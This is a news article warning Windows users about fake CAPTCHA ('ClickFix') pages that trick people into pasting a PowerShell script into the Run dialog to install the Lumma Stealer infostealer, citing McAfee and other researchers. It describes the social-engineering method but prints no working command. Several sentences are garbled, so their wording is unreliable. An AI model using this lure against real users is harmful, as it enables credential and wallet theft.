New warning for millions of Windows users
NurPhoto via Getty ImagesA new warning as we approach the weekend, that a “global attack” is now targeting Windows users in many countries around the world. The campaign is stupidly simple, but it poses a risk to hundreds of millions of Windows 10 users headed for a world without security updates a year from now.
Last month, Palo Alto Networks’ Unit 42 pointed out the danger of fake CAPTCHA news, although it generated little attention at the time, although a video posted on X by a researcher John Hammond helped raise awareness. Now researchers at McAfee have issued a new warning about those fake CAPTCHA popups doing the rounds.
These attacks should be easy to detect — but they are designed to be randomly effective. Fake challenges are designed to distribute Lumma Stealer. “These pages have a button that, when clicked, displays instructions to victims to paste the PowerShell script into a Run window. This PowerShell copy/paste script retrieves and executes a Windows EXE malware for Lumma Stealer. The associated Lumma Stealer EXE files retrieve and use zip files that do not appear to be inherently malicious themselves.
In its new report, McAfee now warns that “the ClickFix infection chain works by tricking users into clicking buttons like Make sure you’re human” or “I’m not a robot.” Once clicked, a malicious script is copied to the user’s clipboard. Users are then tricked into pasting the script after pressing the Windows key + R, unknowingly running the malware. This deception method facilitates the infection process, making it easier for attackers to develop malware.”
You get the pattern. The information-stealing malware planted on your computer will target account details and passwords as well as crypto wallets. It doesn’t look like a regular CAPTCHA, although these are evolving making it harder to be sure. Even so, when you’re copying and pasting, if alarm bells aren’t going off in your head at that point, turn off your computer and maybe take a break.
McAfee highlights two fraudulently crafted lures—targeting those who want to illegally download pirated games and software developers who worry that there might be a security problem with the code they’ve written and released.
Users surfing the Internet for illegal copies of games probably have their guards up anyway, when they do, the team says, “they may come across online forums, community posts, or public repositories that redirect them to malicious links.”
Fake CAPTCHA attack.
McAfeeThe second target group is even more insidious. “Users receive phishing emails, often targeting GitHub contributors, urging them to address a fake ‘security vulnerability.’ These emails contain links to the same fake CAPTCHA pages.”
Hudson Rock’s Infotealers The site reported on the same types of attacks earlier this month, but it still didn’t get the reception it deserved. “Since late August 2024,” the researchers warned, “attackers have been using fraudulent ‘human verification’ pages to trick users into running a malicious PowerShell script.”
“The ClickFix infection chain,” McAfee now says, “shows how cybercriminals exploit common user behaviors—such as downloading cracked software and responding to phishing emails—to distribute malware like Lumma Stealer. By exploiting fake CAPTCHA pages, attackers trick users into executing malicious scripts that bypass detection, ultimately leading to the installation of malware.”
This fake CAPTCHA attack is now becoming a thing—be careful and take a moment when challenged to check for any signs of compromise. It won’t always be as obvious as we see here. Such attacks will evolve and become more difficult to detect. Certainly, you should never, everything cut and paste and run through a CAPTCHA.
In the meantime, this is yet another timely warning to Windows 10 users that whatever they do between now and October next year, losing support shouldn’t be one of them. If Microsoft doesn’t provide expansion options at a reasonable price and the solutions don’t fully fill the void, you should move on to Windows 11.
